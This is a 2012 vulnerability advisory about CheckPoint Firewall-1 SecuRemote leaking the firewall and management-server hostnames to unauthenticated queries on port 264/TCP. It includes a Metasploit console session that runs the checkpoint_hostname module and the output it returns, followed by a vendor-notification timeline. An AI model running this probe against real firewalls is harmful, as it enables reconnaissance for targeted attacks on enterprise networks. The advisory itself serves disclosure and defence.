CheckPoint Firewall SecuRemote Hostname Information Disclosure
Release Date: 12-Mar-2012
Software: CheckPoint Firewall / VPN-1 / http://www.checkpoint.com/
Versions testé:NGX R65, R71. Other versions untested but likely affected.
Vulnerability discovered: By sending a pre-authentication topology request to the VPN SecuRemote service, it is possible to obtain the firewall hostname name and logging or management station (such as SmartCenter) name.
Vulnerability impact: Low – Information disclosure potentially reveals the client naming scheme and the firewall management station hostname. Allows for specifically targeting attacks towards the enterprise firewall management server.
Vulnerability information: By sending a certain query to the port 264/TCP on CheckPoint Firewall-1, the hostname is revealed. A Metasploit module is available to test for this vulnerability.
msf auxiliary(checkpoint_hostname) > set RHOST A.B.C.D
msf auxiliary(checkpoint_hostname) > run
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service…
[+] Appears to be a CheckPoint Firewall…
[+] Firewall Host: CPSYDFW1
[+] SmartCenter Host: CPSYDMGMTSVR
[*] Auxiliary module execution completed
Recommendation: None at this time. Consider a different VPN headend.
Credit: This vulnerability was disclosed by Patrick Webster.
Exploit: A metasploit module is available here:
14-Dec-2011 – Discovered during audit.
21-Dec-2011 – Added auxiliary module to the Metasploit Framework.
23-Dec-2011 – Notified vendor. No response.
12-Mar-2012 – Disclosure.